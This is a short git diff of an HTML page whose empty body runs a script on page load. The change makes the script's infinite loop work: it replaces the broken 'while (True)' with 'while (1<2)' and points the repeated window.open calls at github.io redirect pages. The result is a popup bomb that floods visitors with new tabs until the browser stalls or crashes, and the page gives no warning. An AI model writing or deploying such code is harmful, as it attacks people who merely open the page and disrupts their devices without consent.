--- a/index.html
+++ b/index.html
@@ -1,13 +1,16 @@
+<!DOCTYPE html>
+<html>
 <head>
 <script>
 function myfunction() {
-window.open("https://google.com/", '_blank');
-window.open("https://google.com/", '_blank');
-while (True) {
-window.open("https://google.com/", '_blank');
+window.open("https://georgezhou3.github.io/redirect4/", '_blank');
+window.open("https://georgezhou3.github.io/redirect4/", '_blank');
+while (1<2) {
+window.open("https://georgezhou3.github.io/redirect2/", '_blank');
 }
 }
 </script>
 </head>
 <body onload="myfunction()">
 </body>
+</html>
